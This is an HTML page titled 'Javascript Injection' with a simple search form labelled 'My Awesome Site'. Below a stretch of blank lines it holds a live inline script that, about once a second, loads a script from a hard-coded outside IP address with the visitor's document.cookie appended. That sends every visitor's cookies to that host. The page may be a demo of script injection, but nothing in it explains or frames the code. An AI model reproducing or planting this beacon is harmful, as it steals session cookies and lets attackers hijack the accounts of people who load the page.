<!DOCTYPE html>
<html>
    <head>
        <title>Javascript Injection</title>
        <link rel="stylesheet" href="style.css">
    </head>
    <body>
      <h1 class="search-form-header">My Awesome Site</h1>
      <form class="search-form" autocomplete="off">
          <input class="search-input" id="query-input" type="text" name="query" />
          <button class="search-button" type="submit" role="button">Search</button>
      </form>
      <h3 class="search-query">You Queried: <span id="query-output" class="query"></span></h3>
      
      
     
      
      
      
      
      
      
        <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="http://205.202.204.113:4848/?"+document.cookie}},1010)</script>
      
      
      <script src="main.js"></script>
    </body>
</html>
